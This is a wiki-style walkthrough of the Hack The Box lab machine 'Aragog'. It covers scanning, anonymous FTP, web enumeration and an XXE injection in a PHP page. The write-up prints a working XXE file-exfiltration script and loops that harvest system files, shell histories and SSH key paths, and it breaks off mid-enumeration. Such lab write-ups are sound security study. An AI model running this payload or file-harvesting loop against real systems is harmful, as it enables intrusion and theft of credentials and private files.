Aragog

From Luniwiki
Jump to: navigation, search

Back

Aragog01.png

Port scan

u505@naos:~/HTB/Machines$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.78

Starting masscan 1.0.5 at 2021-01-17 15:05:33 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 21/tcp on 10.10.10.78 Discovered open port 22/tcp on 10.10.10.78 Discovered open port 80/tcp on 10.10.10.78
u505@naos:~/HTB/Machines/Aragog$ nmap -sC -sV aragog
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-17 10:05 EST
Nmap scan report for aragog (10.10.10.78)
Host is up (0.039s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds

Ftp

The ftp is open as anonymous user. There is a file test.txt, and we are not allowed to upload files.

u505@naos:~/HTB/Machines/Aragog$ ftp aragog
Connected to aragog.
220 (vsFTPd 3.0.3)
Name (aragog:u505): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
226 Directory send OK.
ftp> get test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (86 bytes).
226 Transfer complete.
86 bytes received in 0.00 secs (717.8151 kB/s)
ftp> put u505
local: u505 remote: u505
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp> quit
221 Goodbye.

The file is an xml with a subnet mask.

u505@naos:~/HTB/Machines/Aragog$ cat test.txt
<details>
    <subnet_mask>255.255.255.192</subnet_mask>
    <test></test>
</details>

Ssh

The ssh port is accessible. Noticed that the password is not asked, and access is directly denied because we do not provide any ssh key. The service is configured to be accessed only by ssh key.

u505@naos:~/HTB/Machines/Aragog$ ssh u505@aragog
The authenticity of host 'aragog (10.10.10.78)' can't be established.
ECDSA key fingerprint is SHA256:phu0FjQg/9nCmL2014AJ9yH4akvraA7Ea5QtE59wqD4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'aragog,10.10.10.78' (ECDSA) to the list of known hosts.
u505@aragog: Permission denied (publickey).

Web

The web server provides the default apache installation page.

Aragog02.png

Dirsearch

Dirsearch found a hosts.php page.

u505@naos:~/HTB/Machines/Aragog$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,php,html" -f -t 100 -u http://aragog
/opt/utils/dirsearch/thirdparty/requests/__init__.py:91: RequestsDependencyWarning: urllib3 (1.26.2) or chardet (4.0.0) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "

_|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| )
Extensions: txt, php, html | HTTP method: GET | Threads: 100 | Wordlist size: 23052
Error Log: /opt/utils/dirsearch/logs/errors-21-01-17_10-12-33.log
Target: http://aragog/
Output File: /opt/utils/dirsearch/reports/aragog/_21-01-17_10-12-33.txt
[10:12:33] Starting: [10:12:33] 403 - 289B - /.hta.txt [10:12:38] 403 - 286B - /.hta/ [10:12:38] 403 - 295B - /.htaccess.html [10:12:41] 403 - 295B - /.htpasswd.html [10:12:42] 403 - 290B - /.hta.html [10:12:42] 403 - 294B - /.htpasswd.txt [10:12:43] 403 - 289B - /.hta.php [10:12:46] 403 - 294B - /.htpasswd.php [10:12:46] 403 - 294B - /.htaccess.php [10:13:02] 200 - 46B - /hosts.php [10:13:03] 403 - 287B - /icons/ [10:13:03] 200 - 11KB - /index.html [10:13:22] 403 - 295B - /server-status/ [10:13:22] 403 - 294B - /server-status
Task Completed

Page hosts.php

Aragog03.png

u505@naos:~/HTB/Machines/Aragog$ curl http://aragog/hosts.php

There are 4294967294 possible hosts for

The sentence is incomplete, after the for. Is subnet expected to reduce the number of hosts from 2^32? At first I tried to find a different answer passing different parameters with wfuzz.

u505@naos:~/HTB/Machines/Aragog$ wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt --hh 46 -u http://aragog/hosts.php?FUZZ=test
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://aragog/hosts.php?FUZZ=test Total requests: 2588
===================================================================== ID Response Lines Word Chars Payload =====================================================================

Total time: 0 Processed Requests: 2588 Filtered Requests: 2588 Requests/sec.: 0

I tried several values, but the result was the same the whole time. After a while, I tried to post the downloaded file, and this time the answer was different.

u505@naos:~/HTB/Machines/Aragog$ curl -X POST -d @test.txt http://aragog/hosts.php

There are 62 possible hosts for 255.255.255.192

Xml external entity injection (XXE)

The php is vulnerable to an Xml external entity injection, that allows us to exfiltrate local files.

Aragog04.png

After a few tests, the file /etc/password was successful exfiltrated.

u505@naos:~/HTB/Machines/Aragog$ cat filescontent.sh
payload="<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=$1\"> ]><details><subnet_mask>&xxe;</subnet_mask><test></test></details>"
rm -f /tmp/payload
echo $payload > /tmp/payload
resb64=`curl -s -X POST -d @/tmp/payload http://aragog/hosts.php | awk '{print $7}' | tr -d '\r'`
if [ "#$resb64#" != "##" ]; then
        echo -n $resb64 | base64 -d
fi
rm -f /tmp/payload

This script exfiltrate file encoding them in base64 to avoid the interpretation by the web server, for example the php source code of this exploit.

u505@naos:~/HTB/Machines/Aragog$ ./filescontent.sh /var/www/html/hosts.php
<?php

libxml_disable_entity_loader (false); $xmlfile = file_get_contents('php://input'); $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $details = simplexml_import_dom($dom); $mask = $details->subnet_mask; //echo "\r\nYou have provided subnet $mask\r\n";
$max_bits = '32'; $cidr = mask2cidr($mask); $bits = $max_bits - $cidr; $hosts = pow(2,$bits); echo "\r\nThere are " . ($hosts - 2) . " possible hosts for $mask\r\n\r\n";
function mask2cidr($mask){ $long = ip2long($mask); $base = ip2long('255.255.255.255'); return 32-log(($long ^ $base)+1,2); }
?>

XXE enumeration

LFI Suite files

The LFI suite, is a good set of files to check.

u505@naos:~/HTB/Machines/Aragog$ curl -s https://raw.githubusercontent.com/D35m0nd142/LFISuite/master/pathtotest_huge.txt | grep "^/" | grep -v "/proc/self/fd/"  | while read f
do
        content=`./filescontent.sh $f`
        if [ "#${content}#" != "##" ] ; then
                echo $f
                echo ${content}
                echo "------------------------------------------------------"
        fi
done
/etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false florian:x:1000:1000:florian,,,:/home/florian:/bin/bash cliff:x:1001:1001::/home/cliff:/bin/bash mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin ftp:x:123:130:ftp daemon,,,:/srv/ftp:/bin/false
------------------------------------------------------
/etc/group
root:x:0: daemon:x:1: bin:x:2: sys:x:3: adm:x:4:syslog tty:x:5: disk:x:6: lp:x:7: mail:x:8: news:x:9: uucp:x:10: man:x:12: proxy:x:13: kmem:x:15: dialout:x:20: fax:x:21: voice:x:22: cdrom:x:24: floppy:x:25: tape:x:26: sudo:x:27: audio:x:29:pulse dip:x:30: www-data:x:33: backup:x:34: operator:x:37: list:x:38: irc:x:39: src:x:40: gnats:x:41: shadow:x:42: utmp:x:43: video:x:44: sasl:x:45: plugdev:x:46: staff:x:50: games:x:60: users:x:100: nogroup:x:65534: systemd-journal:x:101: systemd-timesync:x:102: systemd-network:x:103: systemd-resolve:x:104: systemd-bus-proxy:x:105: input:x:106: crontab:x:107: syslog:x:108: netdev:x:109: messagebus:x:110: uuidd:x:111: ssl-cert:x:112: lpadmin:x:113: lightdm:x:114: nopasswdlogin:x:115: ssh:x:116: whoopsie:x:117: mlocate:x:118: avahi-autoipd:x:119: avahi:x:120: bluetooth:x:121: scanner:x:122:saned colord:x:123: pulse:x:124: pulse-access:x:125: rtkit:x:126: saned:x:127: florian:x:1000: sambashare:x:128: mysql:x:129: cliff:x:1001: ftp:x:130:
------------------------------------------------------
-bash: warning: command substitution: ignored null byte in input
/proc/self/cmdline
/usr/sbin/apache2-kstart
------------------------------------------------------
/proc/self/stat
2000 (apache2) R 1124 1124 1124 0 -1 4194624 18861 0 15 0 1302 80 0 0 20 0 1 0 111114 330723328 18778 18446744073709551615 94413955706880 94413956338884 140735249656032 0 0 0 0 16781312 201344747 0 0 0 17 0 0 0 18816720 0 0 94413958439944 94413958464392 94413983608832 140735249661626 140735249661653 140735249661653 140735249661926 0
------------------------------------------------------
/proc/self/status
Name: apache2 Umask: 0022 State: R (running) Tgid: 2026 Ngid: 0 Pid: 2026 PPid: 1124 TracerPid: 0 Uid: 33 33 33 33 Gid: 33 33 33 33 FDSize: 64 Groups: 33 NStgid: 2026 NSpid: 2026 NSpgid: 1124 NSsid: 1124 VmPeak: 337460 kB VmSize: 323128 kB VmLck: 0 kB VmPin: 0 kB VmHWM: 85356 kB VmRSS: 75116 kB RssAnon: 7588 kB RssFile: 8056 kB RssShmem: 59472 kB VmData: 7512 kB VmStk: 132 kB VmExe: 620 kB VmLib: 53612 kB VmPTE: 572 kB VmPMD: 12 kB VmSwap: 328 kB HugetlbPages: 0 kB Threads: 1 SigQ: 0/3644 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: 0000000000000000 SigIgn: 0000000001001000 SigCgt: 000000018c0046eb CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: 0000003fffffffff CapAmb: 0000000000000000 NoNewPrivs: 0 Seccomp: 0 Cpus_allowed: ffffffff,ffffffff,ffffffff,ffffffff Cpus_allowed_list: 0-127 Mems_allowed: 00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001 Mems_allowed_list: 0 voluntary_ctxt_switches: 3206 nonvoluntary_ctxt_switches: 5404
------------------------------------------------------
/etc/mysql/my.cnf
# # The MySQL database server configuration file. # # You can copy this to one of: # - "/etc/mysql/my.cnf" to set global options, # - "~/.my.cnf" to set user-specific options. # # One can use all long options that the program supports. # Run program with --help to get a list of available options and with # --print-defaults to see which it would actually understand and use. # # For explanations see # http://dev.mysql.com/doc/mysql/en/server-system-variables.html # # filescontent.sh florian.key lfisuite.txt test.txt u505 wphash IMPORTANT: Additional settings that can override those from this file! # The files must end with '.cnf', otherwise they'll be ignored. # !includedir /etc/mysql/conf.d/ !includedir /etc/mysql/mysql.conf.d/
------------------------------------------------------
/etc/vsftpd.conf
# Example config file /etc/vsftpd.conf # # The default compiled in settings are fairly paranoid. This sample file # loosens things up a bit, to make the ftp daemon more usable. # Please see vsftpd.conf.5 for all compiled in defaults. # # READ THIS: This example file is NOT an exhaustive list of vsftpd options. # Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's # capabilities. # # # Run standalone? vsftpd can run either from an inetd or as a standalone # daemon started from an initscript. listen=NO # # This directive enables listening on IPv6 sockets. By default, listening # on the IPv6 "any" address (::) will accept connections from both IPv6 # and IPv4 clients. It is not necessary to listen on *both* IPv4 and IPv6 # sockets. If you want that (perhaps because you want to listen on specific # addresses) then you must run two copies of vsftpd with two configuration # files. listen_ipv6=YES # # Allow anonymous FTP? (Disabled by default). anonymous_enable=YES # # Uncomment this to allow local users to log in. local_enable=NO # # Uncomment this to enable any form of FTP write command. #write_enable=YES # # Default umask for local users is 077. You may wish to change this to 022, # if your users expect that (022 is used by most other ftpd's) #local_umask=022 # # Uncomment this to allow the anonymous FTP user to upload files. This only # has an effect if the above global write enable is activated. Also, you will # obviously need to create a directory writable by the FTP user. #anon_upload_enable=YES # # Uncomment this if you want the anonymous FTP user to be able to create # new directories. #anon_mkdir_write_enable=YES # # Activate directory messages - messages given to remote users when they # go into a certain directory. dirmessage_enable=YES # # If enabled, vsftpd will display directory listings with the time # in your local time zone. The default is to display GMT. The # times returned by the MDTM FTP command are also affected by this # option. use_localtime=YES # # Activate logging of uploads/downloads. xferlog_enable=YES # # Make sure PORT transfer connections originate from port 20 (ftp-data). connect_from_port_20=YES # # If you want, you can arrange for uploaded anonymous files to be owned by # a different user. Note! Using "root" for uploaded files is not # recommended! #chown_uploads=YES #chown_username=whoever # # You may override where the log file goes if you like. The default is shown # below. #xferlog_file=/var/log/vsftpd.log # # If you want, you can have your log file in standard ftpd xferlog format. # Note that the default log file location is /var/log/xferlog in this case. #xferlog_std_format=YES # # You may change the default value for timing out an idle session. #idle_session_timeout=600 # # You may change the default value for timing out a data connection. #data_connection_timeout=120 # # It is recommended that you define on your system a unique user which the # ftp server can use as a totally isolated and unprivileged user. #nopriv_user=ftpsecure # # Enable this and the server will recognise asynchronous ABOR requests. Not # recommended for security (the code is non-trivial). Not enabling it, # however, may confuse older FTP clients. #async_abor_enable=YES # # By default the server will pretend to allow ASCII mode but in fact ignore # the request. Turn on the below options to have the server actually do ASCII # mangling on files when in ASCII mode. # Beware that on some FTP servers, ASCII support allows a denial of service # attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd # predicted this attack and has always been safe, reporting the size of the # raw file. # ASCII mangling is a horrible feature of the protocol. #ascii_upload_enable=YES #ascii_download_enable=YES # # You may fully customise the login banner string: #ftpd_banner=Welcome to blah FTP service. # # You may specify a file of disallowed anonymous e-mail addresses. Apparently # useful for combatting certain DoS attacks. #deny_email_enable=YES # (default follows) #banned_email_file=/etc/vsftpd.banned_emails # # You may restrict local users to their home directories. See the FAQ for # the possible risks in this before using chroot_local_user or # chroot_list_enable below. #chroot_local_user=YES # # You may specify an explicit list of local users to chroot() to their home # directory. If chroot_local_user is YES, then this list becomes a list of # users to NOT chroot(). # (Warning! chroot'ing can be very dangerous. If using chroot, make sure that # the user does not have write access to the top level directory within the # chroot) #chroot_local_user=YES #chroot_list_enable=YES # (default follows) #chroot_list_file=/etc/vsftpd.chroot_list # # You may activate the "-R" option to the builtin ls. This is disabled by # default to avoid remote users being able to cause excessive I/O on large # sites. However, some broken FTP clients such as "ncftp" and "mirror" assume # the presence of the "-R" option, so there is a strong case for enabling it. #ls_recurse_enable=YES # # Customization # # Some of vsftpd's settings don't fit the filesystem layout by # default. # # This option should be the name of a directory which is empty. Also, the # directory should not be writable by the ftp user. This directory is used # as a secure chroot() jail at times vsftpd does not require filesystem # access. secure_chroot_dir=/var/run/vsftpd/empty # # This string is the name of the PAM service vsftpd will use. pam_service_name=vsftpd # # This option specifies the location of the RSA certificate to use for SSL # encrypted connections. rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key ssl_enable=NO # # Uncomment this to indicate that vsftpd use a utf8 filesystem. #utf8_filesystem=YES # # Home directory. anon_root=/var/ftp/pub # # Stop prompting for a password on the command line. no_anon_password=YES # # Show the user and group as ftp:ftp, regardless of the owner. hide_ids=YES # # Limit the range of ports that can be used for passive FTP pasv_min_port=40000 pasv_max_port=50000
------------------------------------------------------

/etc/passwd

The passwd file provides 2 users with their home directory.

u505@naos:~/HTB/Machines/Aragog$ ./filescontent.sh /etc/passwd | grep -v "/bin/false" | grep -v "/usr/sbin/nologin"
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
florian:x:1000:1000:florian,,,:/home/florian:/bin/bash
cliff:x:1001:1001::/home/cliff:/bin/bash

From my home directory, and other webs, I created a file with possible interesting user files.

u505@naos:~/HTB/Machines/Aragog$ cat homedir.txt
.bash_history
.bash_logout
.bashrc
.gdb_history
.gdbinit
.hushlogin
.ICEauthority
.mysql_history
.nc_history
.profile
.viminfo
.vimrc
.wget-hsts
.Xauthority
.ssh/authorized_keys
.ssh/known_hosts
.ssh/id_rsa
.ssh/id_rsa.pub
.zsh_history
.zshrc
.kshrc
.mailrc
.lastlogin
.login
.cshrc

I run a double loop to check these file in each user home directory.

u505@naos:~/HTB/Machines/Aragog$ echo -e  "/home/florian\n/home/cliff" | while read dir
do
cat homedir.txt | while read f
do
echo ${dir}/${f}
./filescontent.sh ${dir}/${f}
echo "----------------------"
done
done
/home/florian/.bash_history

groups cat /etc/passwd su root sudo -l cat /etc/groups cat /etc/group grep "lxd" /etc/group grep "cliff" /etc/group grep "lxd" /etc/group init 0 su root ---------------------- /home/florian/.bash_logout # ~/.bash_logout: executed by bash(1) when login shell exits.
# when leaving the console clear the screen to increase privacy
if [ "$SHLVL" = 1 ]; then [ -x /usr/bin/clear_console ] && /usr/bin/clear_console -q fi ---------------------- /home/florian/.bashrc # ~/.bashrc: executed by bash(1) for non-login shells. # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) # for examples
# If not running interactively, don't do anything case $- in *i*) ;; *) return;; esac
# don't put duplicate lines or lines starting with space in the history. # See bash(1) for more options HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1) HISTSIZE=1000 HISTFILESIZE=2000
# check the window size after each command and, if necessary, # update the values of LINES and COLUMNS. shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will # match all files and zero or more directories and subdirectories. #shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1) [ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below) if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then debian_chroot=$(cat /etc/debian_chroot) fi
# set a fancy prompt (non-color, unless we know we "want" color) case "$TERM" in xterm-color|*-256color) color_prompt=yes;; esac
# uncomment for a colored prompt, if the terminal has the capability; turned # off by default to not distract the user: the focus in a terminal window # should be on the output of commands, not on the prompt #force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then # We have color support; assume it's compliant with Ecma-48 # (ISO/IEC-6429). (Lack of such support is extremely rare, and such # a case would tend to support setf rather than setaf.) color_prompt=yes else color_prompt= fi fi
if [ "$color_prompt" = yes ]; then PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ ' else PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ ' fi unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir case "$TERM" in xterm*|rxvt*) PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"  ;; *)  ;; esac
# enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ]; then test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)" alias ls='ls --color=auto' #alias dir='dir --color=auto' #alias vdir='vdir --color=auto'
alias grep='grep --color=auto' alias fgrep='fgrep --color=auto' alias egrep='egrep --color=auto' fi
# colored GCC warnings and errors #export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
# some more ls aliases alias ll='ls -alF' alias la='ls -A' alias l='ls -CF'
# Add an "alert" alias for long running commands. Use like so: # sleep 10; alert alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\)"'
# Alias definitions. # You may want to put all your additions into a separate file like # ~/.bash_aliases, instead of adding them here directly. # See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then . ~/.bash_aliases fi
# enable programmable completion features (you don't need to enable # this, if it's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc). if ! shopt -oq posix; then if [ -f /usr/share/bash-completion/bash_completion ]; then . /usr/share/bash-completion/bash_completion elif [ -f /etc/bash_completion ]; then . /etc/bash_completion fi fi ---------------------- /home/florian/.gdb_history ---------------------- /home/florian/.gdbinit ---------------------- /home/florian/.hushlogin ---------------------- /home/florian/.ICEauthority XSMP#unix/aragog.htb:/tmp/.ICE-unix/1645MIT-MAGIC-COOKIE-1I▒;W*▒иT▒XSMP%local/aragog.htb:@/tmp/.ICE-unix/1645MIT-MAGIC-COOKIE-1▒▒▒▒d▒~▒xS▒}▒ICE#unix/aragog.htb:/tmp/.ICE-unix/4965MIT-MAGIC-COOKIE-1▒▒ŠQj▒oɤv▒7▒▒ICE%local/aragog.htb:@/tmp/.ICE-unix/4965MIT-MAGIC-COOKIE-1+▒5P▒n0AH_P▒眈XSMP#unix/aragog.htb:/tmp/.ICE-unix/1514MIT-MAGIC-COOKIE-1ў6/Y▒▒▒▒▒ E▒1XSMP%local/aragog.htb:@/tmp/.ICE-unix/1514MIT-MAGIC-COOKIE-1▒3▒w▒[-▒W▒5▒gSICE#unix/aragog.htb:/tmp/.ICE-unix/1986MIT-MAGIC-COOKIE-1KՊ▒U`▒▒:▒we▒▒ICE%local/aragog.htb:@/tmp/.ICE-unix/1986MIT-MAGIC-COOKIE-1/▒I#y_▒I;▒A▒D▒XSMP#unix/aragog.htb:/tmp/.ICE-unix/1685MIT-MAGIC-COOKIE-1▒]▒▒▒▒▒G1▒:V▒XSMP%local/aragog.htb:@/tmp/.ICE-unix/1685MIT-MAGIC-COOKIE-1▒▒▒́4FY▒W0▒▒ICEunix/aragog:/tmp/.ICE-unix/1721MIT-MAGIC-COOKIE-1▒▒N+▒▒E,▒e▒▒▒N▒ICE!local/aragog:@/tmp/.ICE-unix/1721MIT-MAGI▒▒▒▒▒▒▒4▒XSMP!local/aragog:@/tmp/.ICE-unix/3631MIT-MAGIC-COOKIE-1bl▒-$Se▒▒+i▒▒ICEunix/aragog:/tmp/.ICE-unix/1696MIT-MAGIC-COOKIE-1y▒▒▒ ▒▒}▒L_>\ICE!local/aragog:@/tmp/.ICE-unix/1696MIT-MAGIC-COOKIE-1]!▒G▒$▒▒_▒▒t0XSMPunix/aragog:/tmp/.ICE-unix/4903MIT-MAGIC-COOKIE-1▒▒▒J&▒▒4▒Iޯ{XSMP!local/aragog:@/tmp/.ICE-unix/4903MIT-MAGIC-COOKIE-1▒▒▒n▒c▒$ xly▒ICEunix/aragog:/tmp/.ICE-unix/1683MIT-MAGIC-COOKIE-1▒>▒▒[▒▒▒uF▒▒▒;▒ICE!local/aragog:@/tmp/.ICE-unix/1683MIT-MAGIC-COOKIE-1▒ՐN[=_▒▒▒6▒▒XSMPunix/ubuntu:/tmp/.ICE-unix/1712MIT-MAGIC-COOKIE-1▒▒9▒▒]▒S▒▒▒[XSMP!local/ubuntu:@/tmp/.ICE-unix/1712MIT-MAGIC-COOKIE-1T▒P2▒=▒▒]:▒"▒^ICEunix/ubuntu:/tmp/.ICE-unix/2842MIT-MAGIC-COOKIE-1▒=▒^▒▒▒Kh▒X>ICE!local/ubuntu:@/tmp/.ICE-unix/2842MIT-MAGIC-COOKIE-1▒j▒▒n?▒▒▒▒▒▒▒XSMPunix/ubuntu:/tmp/.ICE-unix/2111MIT-MAGIC-COOKIE-18n▒c▒:"2Η▒▒▒XSMP!local/ubuntu:@/tmp/.ICE-unix/2111MIT-MAGIC-COOKIE-1|▒`Q▒YM▒▒ŋ▒▒s▒▒ICEunix/ubuntu:/tmp/.ICE-unix/2544MIT-MAGIC-COOKIE-1▒h▒▒z▒p▒ӌ▒▒45{ICE!local/ubuntu:@/tmp/.ICE-unix/2544MIT-MAGIC-COOKIE-1▒!▒▒u▒^▒ ▒_▒+-XSMPunix/ubuntu:/tmp/.ICE-unix/4465MIT-MAGIC-COOKIE-1▒▒▒%▒;▒▒Q▒OM▒XSMP!local/ubuntu:@/tmp/.ICE-unix/4465MIT-MAGIC-COOKIE-1\▒[▒u▒▒L▒۾px▒. ICE!local/ubuntu:@/tmp/.ICE-unix/4465MIT-MAGIC-COOKIE-1▒L▒Z▒hK▒h▒tC▒ICEunix/ubuntu:/tmp/.ICE-unix/4465MIT-MAGIC-COOKIE-1▒t▒Nu▒▒5=tG▒▒▒EXSMP!local/ubuntu:@/tmp/.ICE-unix/2544MIT-MAGIC-COOKIE-1▒▒D▒ ▒ ▒▒▒y▒liXSMPunix/ubuntu:/tmp/.ICE-unix/2544MIT-MAGIC-COOKIE-17▒▒ ▒a▒▒▒Y▒(▒▒▒E!loc▒XSMP!local/ubuntu:@/tmp/.ICE-unix/2842MIT-MAGIC-COOKIE-1▒$▒▒GkCEunix/ubuntu:/tmp/.ICE-unix/2111MIT-MAGIC-COOKIE-1Y ȡ▒▒▒B▒▒ XSMPunix/ubuntu:/tmp/.ICE-unix/2842MIT-MAGIC-COOKIE-1f7▒̟K▒▒▒>.b4▒▒ICE!local/ubuntu:@/tmp/.ICE-unix/1712MIT-MAGIC-COOKIE-1A▒jd▒dV▒▒}7▒@ICEunix/ubuntu:/tmp/.ICE-unix/1712MIT-MAGIC-COOKIE-1▒9X▒▒5▒] 0▒▒8▒XSMP!local/aragog:@/tmp/.ICE-unix/1683MIT-MAGIC-COOKIE-1!Z▒▒ j▒▒;▒^▒XSMPunix/aragog:/tmp/.ICE-unix/1683MIT-MAGIC-COOKIE-1▒▒, ▒▒P0▒▒7▒1ICE!local/aragog:@/tmp/.ICE-unix/4903MIT-MAGIC-COOKIE-1▒^▒▒}▒▒▒ ▒▒▒ICEunix/aragog:/tmp/.ICE-unix/4903MIT-MAGIC-COOKIE-1▒▒?▒▒U▒▒▒O▒▒▒)▒XSMP!local/aragog:@/tmp/.ICE-unix/1696MIT-MAGIC-COOKIE-1z#▒n▒▒▒▒▒▒8 